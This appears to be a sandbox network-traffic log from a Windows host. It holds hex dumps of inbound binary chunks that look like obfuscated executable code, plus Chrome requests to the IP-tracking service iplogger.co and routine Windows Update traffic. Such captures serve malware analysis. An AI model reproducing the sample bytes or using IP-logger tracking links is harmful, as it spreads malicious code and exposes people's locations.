2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 64 34 ab 02 47 a0 bd fc bc 30 52 5b 5f 51 0a 01 41 e2 da 76 e8 1e 78 5c 82 48 cc 82 1e 53 09 ee 46 44 2a 71 e3 09 41 c7 44 24 00 66 b0 0d b6 e8 6e 47 0b 00 b8 ab dd 05 da 8b 14 27 0f ab c0 66 c1 c8 e1 c0 c8 47 8b 44 27 04 0f 82 ba ad 45 00 4d 8b 17 49 81 c7 08 00 00 00 4d 33 d3 e8 fb 41 08 00 c7 44 24 00 ee 63 7f 53 e8 ef 7f 0a 00 b8 34 6e 12 f9 0f ba f0 00 66 d1 c3 f7 d8 48 c1 c0 31 0d 26 c3 9b 1b 66 f7 db 0f ba e0 bc 66 d1 cb 66 0f af c0 48 f7 d8 e8 2c f3 3b 00 ba 2d 87 b3 32 0f be c2 66 8b 44 38 d3 c0 e2 62 33 d2 fe c2 8d 3c 57 e8 da 6a 49 00 68 2e 0e 18 ba e8 52 71 0a 00 e8 e2 88 01 00 8d 64 24 0c e9 0e 56 0d 00 89 56 00 8d 64 24 0c e9 02 56 0d 00 0b c1 89 44 25 00 e9 ff 4c 0d 00 b9 06 a3 34 70 8b 84 0f fa 5c cb 8f c0 f1 45 66 33 c9 8b 8c 39 04 00 cc Data Ascii: d4G0R[_QAvx\HSFD*qAD$fnG'fGD'EMIM3AD$cS4nfH1&fffH,;-2fD8b3<WjIh.Rqd$VVd$VD%L4p\Ef39
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 42 07 3a f5 3e 02 a4 49 85 4a 63 6d 78 60 fa f7 78 84 2b c0 6d 9a af c1 f4 97 97 e0 26 d5 11 e1 0a 6f 14 55 75 26 84 b1 d5 77 b9 76 5a 0c 3c 84 97 a2 88 11 d5 f2 39 7e 9c 88 42 d8 a5 b4 3f 24 d8 c8 13 68 a4 5f e3 e6 b7 b5 6e c2 e6 3c 80 90 d2 c9 5d e6 53 76 cc 80 e7 f4 de 84 b9 f8 0f 8a 13 91 46 00 0f 82 cc ff 0b 00 66 0f b6 14 21 68 88 72 94 17 81 dd 01 00 00 00 66 89 54 25 00 68 90 a1 0b 2b 8d 64 24 08 e9 b3 7c 39 00 03 01 55 f0 cd 5f 0b fe 43 91 45 10 6d d7 c3 ee d3 59 0d 80 6e d6 a7 23 d9 cd d8 a5 cf db 16 0c af a6 6e 34 d8 f8 25 d8 f5 02 3c c2 0b 78 26 17 00 00 00 00 89 e3 81 7a 62 da cf b2 90 7c 41 00 a2 a5 8c e1 f9 af 38 00 00 00 00 2f 9b 9f d3 2d 1e e5 94 45 18 25 0a 0e 56 c0 ea b0 27 00 00 00 00 4e 24 0f 0c 2a 93 95 6c 68 7b 65 ef f4 8f 22 d7 00 Data Ascii: B:>IJcmx`x+m&oUu&wvZ<9~B?$h_n<]SvFf!hrfT%h+d$\|9U_CEmYn#n4%<x&zb\|A8/-E%V'N$*lh{e"
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 19 e2 99 bc bc e1 5f 58 1c 3c 87 66 08 dc 18 89 fc 96 42 35 6b c1 23 e2 a0 cc 3b 0e f1 6b d2 00 5a ae be 5d c7 8b 43 b5 79 49 73 09 9d 4d 7f 05 00 fa 7e 42 3a a9 d2 4e 9e 15 9a ca 6b e7 d9 0c 71 2b ff c2 ff 15 01 f4 49 23 37 7a 07 4d 99 54 29 93 87 aa 97 45 91 0c 43 1b e6 da c0 94 e9 a2 74 36 2f ef 03 80 00 00 c9 07 3f d2 a1 f8 ff ff ff eb bf 80 ef 07 44 40 d4 81 2c 57 ed 4e c5 09 39 5b c0 9c 81 82 6e 5e 74 2e 13 02 40 da 06 56 c5 be e3 b2 c0 ba ff ce 3d 46 4b 7a d9 82 26 dd 49 80 86 c2 81 58 3a f8 2c 41 fc 4e 5a 4f 55 fe e7 17 2d 39 cc 71 93 dc 86 e6 34 a1 dc 8e 5a 07 7a a8 86 46 e7 82 cf b2 30 64 59 bc 2c af c6 44 cf c4 a3 06 b5 c0 0f 01 f6 60 76 b9 f3 e3 f9 ab 66 b2 ec 28 0c 78 df 7e 87 54 2f 2a 1b 98 02 6e b0 90 64 74 87 fc 89 98 a2 19 4d b0 43 66 57 Data Ascii: _X<fB5k#;kZ]CyIsM~B:Nkq+I#7zMT)ECt6/?D@,WN9[n^t.@V=FKz&IX:,ANZOU-9q4ZzF0dY,D`vf(x~T/*ndtMCfW
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 05 1f 1e 1e 71 76 12 3e 75 99 83 8c e3 70 44 dc 2f 95 d4 05 1f a6 ef 80 90 54 7a 48 92 88 61 f6 c5 ba 14 12 d7 64 35 3e 46 03 a2 11 3c 65 0a 19 e0 d7 08 e4 3c 54 f7 39 76 c3 e7 9a e5 2e b4 be 35 77 06 61 a4 f5 94 49 c6 8e 86 13 ad 21 aa c2 e0 43 24 af 8f ee a9 42 7a 13 02 e3 3d ae e5 0a 3c 57 3c e4 18 c9 ee 43 9b 9b 21 9a 8d 75 a3 e9 46 f7 80 7d dd 0d c6 d6 de a1 98 05 00 d8 9c 22 ae 8a 37 c2 42 7b 04 b9 23 e0 9d b9 c4 bd 04 14 25 48 fd b7 88 e9 58 70 69 1c 81 99 90 f7 2b 7d 25 03 51 ea 43 20 3d 0d ed c7 7c 6b 83 4d 27 b8 a1 c4 d2 d0 90 d2 c0 f2 e9 92 47 78 32 3c 59 77 1c 0d 03 36 f3 de 94 ab 2e 63 25 1e 7f ce ee 8f fe 3f 31 12 71 c6 d4 e3 9c f5 b8 b4 b4 2b 60 66 c1 f8 21 66 0f ab c0 8b 84 06 a6 21 d4 9f b9 3f 6c 14 ca 66 8b 0c 20 68 03 34 15 2f 66 c1 6c Data Ascii: qv>upD/TzHad5>F<e<T9v.5waI!C$Bz=<W<C!uF}"7B{#%HXpi+}%QC =\|kM'Gx2<Yw6.c%?1q+`f!f!?lf h4/fl
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 48 87 47 00 0f 85 2f 0e 0c 00 68 86 7d 3c 8d be 81 06 25 9f 8b 4c 25 00 e8 e6 30 49 00 e8 3a 4c 03 00 0f 05 e8 b6 bb 48 00 e8 40 44 11 00 31 87 67 1d 78 c5 6f 7b be c3 41 1b b8 66 10 fd 72 2e 67 48 f2 66 5a 85 67 1a 40 66 9b 69 7d 88 35 5f 4b 66 5b 61 75 b8 e4 b0 dd c4 49 1e 67 7c f3 c9 75 d1 8e ed c3 31 06 1a a3 2f a4 4f 9e 96 02 92 e6 e4 ff c0 f8 24 33 e5 0e b2 85 36 3b 5c bd b7 8c c0 c7 08 ff ca 82 67 58 8d be de 08 ea 36 3b 5c bd b7 10 9c 7d 9a 78 43 aa 3c de 2b cd 4a 56 0a 5f 33 54 bc 62 c1 f4 7c 25 87 2f 34 c9 77 99 d1 dd 33 7f 5a 1f f7 b4 c7 9d 8b b0 b2 d9 1b 90 f9 db eb 77 7f ce 2a 5b 84 67 c8 54 4a 98 c9 d9 29 bd 31 bd 27 ea 3e 3e e5 bf 60 11 d1 56 4d d3 33 b8 f1 45 d1 0d 36 68 80 c3 d5 01 10 13 a9 ef 72 b2 ce bc ba 50 57 98 c9 d9 29 04 48 cf 07 Data Ascii: HG/h}<%L%0I:LH@D1gxo{Afr.gHfZg@fi}5_Kf[auIg\|u1/O$36;\gX6;\}xC<+JV_3Tb\|%/4w3Zw*[gTJ)1'>>`VM3E6hrPW)H
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 05 23 79 cf e5 f3 07 86 6a 53 2c e5 ca 15 cf 88 44 c8 c7 f4 a7 35 c0 82 d8 4b b4 0a 55 6a 2b 48 35 44 17 46 54 ac 56 79 f0 e3 41 4b a4 f2 9e 40 7b f6 57 35 f6 5f 0e 2c 8d 91 82 b6 fd 9b dd 79 c4 f9 ad f9 ad ad 18 5f 7d 1b 99 8a e7 ed e9 f3 82 8f f7 82 37 b6 06 ed 88 02 17 aa 3c 92 92 58 95 53 80 1e 39 04 83 58 25 cb 8e 9c c6 bc 4b f5 43 0f 26 54 24 11 70 2a 3b 4c 26 a9 5d 44 cb ae 24 70 9d 90 26 90 e4 17 5a 1b 62 53 1d 46 2a a7 db 36 e4 2d c8 43 1a 1f 4d 32 52 8d 64 24 04 e9 4b 3a 09 00 0f 34 e8 6c 02 39 00 e8 e0 8f 07 00 0f 85 88 1e 0d 00 8b 44 25 00 e9 ef dd 43 00 ba 04 99 15 64 e8 aa 51 0f 00 59 81 c1 12 75 04 00 ff e1 b8 1b b0 92 f6 8b 04 26 68 a8 e7 82 6e 8a 4e 04 f7 54 24 00 68 a4 eb b5 22 81 c6 06 00 00 00 36 88 08 e8 8f ec 07 00 66 45 33 e3 48 c7 Data Ascii: #yjS,D5KUj+H5DFTVyAK@{W5_,y_}7<XS9X%KC&T$p;L&]D$p&ZbSF6-CM2Rd$K:4l9D%CdQYu&hnNT$h"6fE3H
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 14 e8 80 da ad c1 74 24 14 d9 32 da e8 69 67 07 00 8b 8c 0e 48 94 c6 df e8 ab d5 fe ff 68 02 5e b5 e8 e8 70 5c fe ff e9 58 c1 0e 00 89 5f 08 68 0e d9 90 7c 89 4f 04 e8 c6 5e 06 00 8b 6c 25 00 e8 e8 b7 11 00 8d 64 24 08 e9 9d 13 3f 00 00 00 00 b6 c0 33 4d 20 f0 34 3a 9a a1 3d a3 0c 91 3a d4 af 04 5e 4a 39 34 59 3d 83 65 50 a4 15 55 57 d3 84 48 e8 43 12 78 ef 34 a8 29 e6 ad 3e 19 e1 da 9d 8c 85 44 0b bc 82 33 b1 ed 8b aa 27 dd 8c dd d2 d0 84 50 44 e0 83 27 fe b1 8a be 68 81 8d c9 cb 14 e9 57 5d 24 ee 20 e7 75 e7 b9 71 45 e0 ce e0 58 5f 5e 76 68 58 29 cc 39 51 b0 5a 09 56 c7 f9 9c 32 59 6f ac 35 2e d5 fd 3c b7 43 cd 3b c0 7e e0 5d 76 e8 d0 5a 01 52 81 53 98 c4 b1 54 ef 67 24 30 71 f1 14 37 06 4b 45 3e 9f dd 75 39 e8 4c 68 86 78 da 58 81 0f 60 09 88 96 f6 39 Data Ascii: t$2igHh^p\X_h\|O^l%d$?3M 4:=:^J94Y=ePUWHCx4)>D3'PD'hW]$ uqEX_^vhX)9QZV2Yo5.<C;~]vZRSTg$0q7KE>u9LhxX`9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	172.67.167.249	443	5804	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:32 UTC	659	OUT	GET /1lLub HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-27 03:58:33 UTC	1147	IN	HTTP/1.1 200 OK Date: Thu, 27 Jun 2024 03:58:33 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 54493797137263905=2; expires=Fri, 27 Jun 2025 03:58:33 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=8.46.123.33; expires=Fri, 27 Jun 2025 03:58:33 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.42440032958984375 expires: Thu, 27 Jun 2024 03:58:33 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEIIOe1WAAJjqh3Vnu0POoVKt%2FgTbQ7yRetykBkFaTkcjDg%2FVQHLJ%2BmpqbSjOR9HitPpfns%2BYlxgtH0u7yI8at%2F604p13lgn7sRWFngd2oIMq%2BnDaigJoAiFiQtz4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89a284ee3c3d5e6d-EWR alt-svc: h3=":443"; ma=86400
2024-06-27 03:58:33 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-06-27 03:58:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:32 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zgAu8AhbCZfWDEn&MD=ZxexwrtV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-27 03:58:32 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 0c1aab49-98b4-40fa-a049-ec04bf771980 MS-RequestId: 060b0cb7-afd0-42f2-9d97-68e20cd28332 MS-CV: WCMGGsw++0aIqT5o.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 27 Jun 2024 03:58:31 GMT Connection: close Content-Length: 24490
2024-06-27 03:58:32 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-27 03:58:32 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49720	172.67.167.249	443	5804	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:33 UTC	637	OUT	GET /favicon.ico HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://iplogger.co/1lLub Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
2024-06-27 03:58:34 UTC	869	IN	HTTP/1.1 200 OK Date: Thu, 27 Jun 2024 03:58:34 GMT Content-Type: image/x-icon Content-Length: 2833 Connection: close last-modified: Tue, 07 Jun 2022 11:44:38 GMT etag: "629f3a26-b11" strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QL94nOclMRk5eXoXQ3a8zEy1ZBsm8ls7J2SrYBJN%2Fdsmpii%2FjRoN94f8q6c6MP5fFQxR3t4TWaTO5F7VTlyDB5yVaxW0RDQd8cRDFasXT9SRFYFLNPmb%2FMvtqCNOGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89a284f4dc980cc2-EWR alt-svc: h3=":443"; ma=86400
2024-06-27 03:58:34 UTC	500	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}\|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
2024-06-27 03:58:34 UTC	1369	IN	Data Raw: be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a Data Ascii: _Vc&rzM9BdJp\|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#\|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3
2024-06-27 03:58:34 UTC	964	IN	Data Raw: b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 Data Ascii: 4 iG6p,RY3dA/F0p?>)\5THz@zlF[2`Y\|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49723	172.67.167.249	443	5804	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:34 UTC	400	OUT	GET /favicon.ico HTTP/1.1 Host: iplogger.co Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
2024-06-27 03:58:35 UTC	875	IN	HTTP/1.1 200 OK Date: Thu, 27 Jun 2024 03:58:35 GMT Content-Type: image/x-icon Content-Length: 2833 Connection: close last-modified: Tue, 07 Jun 2022 11:44:38 GMT etag: "629f3a26-b11" strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5xkfuYcSudOhJhxFYvTnSS3hJDph0%2F6btrEpLXJ%2FaOvlCzil9Hdaq90B%2BfJaE5IeuztyYb3zMf%2F1jbcSzDQZ6HlffUDYQuQ%2BlsHthU%2BQtJQIt0yi4EzgSJkYdISsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89a284fceb4932d3-EWR alt-svc: h3=":443"; ma=86400
2024-06-27 03:58:35 UTC	494	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}\|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
2024-06-27 03:58:35 UTC	1369	IN	Data Raw: dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 Data Ascii: \_Vc&rzM9BdJp\|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#\|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0
